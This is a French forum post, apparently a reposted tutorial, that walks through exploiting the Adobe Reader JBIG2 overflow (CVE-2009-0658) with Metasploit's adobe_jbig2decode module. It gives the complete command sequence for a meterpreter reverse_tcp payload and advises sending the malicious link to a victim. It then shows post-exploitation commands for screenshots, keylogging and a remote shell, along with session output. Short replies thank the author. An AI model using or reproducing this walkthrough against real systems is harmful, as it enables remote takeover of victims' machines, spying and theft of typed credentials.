Metasploit et les failles dans Adobe Reader et Flash Player

[illuminat]

Metasploit et les failles dans Adobe Reader et Flash Player Nous avons vu dernièrement l'utilisation de metasploit sous linux ,Nous allons maintenant approfondir un peu plus le sujet, en prenant pour exemple l'exploitation d'une faille dans un des logiciels de la société Adobe.

La faille (CVE-2009-0658) que nous allons utiliser pour notre exemple, concerne un problème de sécurité lors de la lecture de fichiers PDF qui utilisent la compression JBIG2. Dans certains cas, l'ouverture du fichier avec Adobe Reader peu provoquer un "Buffer overflow" et permettre ainsi à une personne malveillante de prendre le contrôle d'une machine à distance.

Attention, seules les versions suivantes d'Adobe Reader sont concernées :

* Adobe Reader v9.0.0 (Windows XP SP3)
* Adobe Reader v8.1.2 (Windows XP SP2)

Le module disponible dans Metasploit permettant de reproduire cette faille est connu sous le nom de "adobe_jbig2decode". Voici comment l'utiliser

كود:

msf > use windows/browser/adobe_jbig2decode
msf > info windows/browser/adobe_jbig2decode
msf > show options
msf > set SRVHOST 192.168.1.100
msf > set SRVPORT 80
msf > set URIPATH /
msf > show targets
msf > set targets 0
msf > show payloads
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.1.100

Ici, on charge le payload "reverse_tcp". Ce bout de shellcode sera exécuté sur la machine cible une fois la vulnérabilité exploitée. Une connexion de type TCP inversée sera alors initialisée et vous permettra d'ouvrir une session distante (même à travers un firewall).

Le module étant correctement configuré, on peut lancer l'attaque :

كود:

msf > exploit[*] Exploit running as background job.[*] Started reverse handler on 192.168.1.100:4444[*] Using URL: http://1192.168.1.100:80/[*] Server started.

Un serveur web temporaire est alors démarré. Il faut ensuite envoyer l'adresse de la page ([] à une victime. Lorsque celle-ci cliquera sur le lien, un fichier PDF malveillant sera alors proposé au téléchargent. Si la personne accepte son ouverture avec Adobe Reader, Metasploit vous indiquera quelque chose comme ceci (à condition bien entendu, qu'elle utilise une des versions vulnérables citées ci-dessus) :

كود:

[*] Sending Adobe JBIG2Decode Memory Corruption Exploit to 192.168.1.106:60840...[*] Sending stage (748032 bytes) to 192.168.1.106[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.106:60251)

Il ne nous reste plus qu'à ouvrir une session à distance sur la machine :

كود:

msf > sessions -i 1[*] Starting interaction with 1...

Ensuite, libre à vous de faire ce que vous voulez, comme récupérer des informations :

كود:

meterpreter > ipconfig
meterpreter > getuid
Server username: WINXP\Developer

Prendre un screenshot du bureau :

كود:

meterpreter > use espia
Loading extension espia...success.
meterpreter > screenshot hack.bmp

Démarrer un keylogger afin de capturer tout ce qui est saisi au clavier :

كود:

meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop

Ou encore ouvrir une boîte de dialogue MS-DOS :

كود:

meterpreter > shell
    Process 892 created.
    Channel 1 created.
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\Documents and Settings\Developer\Desktop>

Bien entendu, la méthode décrite ci-dessous peut-être utilisée pour des failles touchant différentes versions du lecteur Adobe Flash Player ou d'Adobe Reader. Il est possible de lister l'ensemble des exploits connus avec la commande suivante sous Metasploit :

كود:

sf > search adobe

Source : Sébastien Bilbeau

illustration : Cyt.

[D3r K0n!G]

Emm !!
merci pour le cours frère
et j crois q il est très claire pour tt le monde

[illuminat]

Merci pour le passage Bro, Oui je crois aussi c'est si clair =p

[BlackMask]

intéressent le cours merci l'amie pour ce beau travail

[malek2610]

Merci pour le cours mon frère, c'était bien expliqué